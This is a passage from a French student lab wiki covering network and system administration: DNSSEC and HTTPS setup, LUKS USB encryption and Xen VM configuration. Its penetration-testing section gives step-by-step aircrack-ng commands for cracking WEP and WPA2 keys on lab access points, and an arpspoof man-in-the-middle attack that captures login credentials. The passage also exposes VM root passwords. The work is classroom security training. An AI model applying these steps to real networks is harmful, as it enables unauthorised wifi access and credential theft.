On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54015</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54015"/>
				<updated>2020-11-27T17:16:59Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Serveur SSH */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
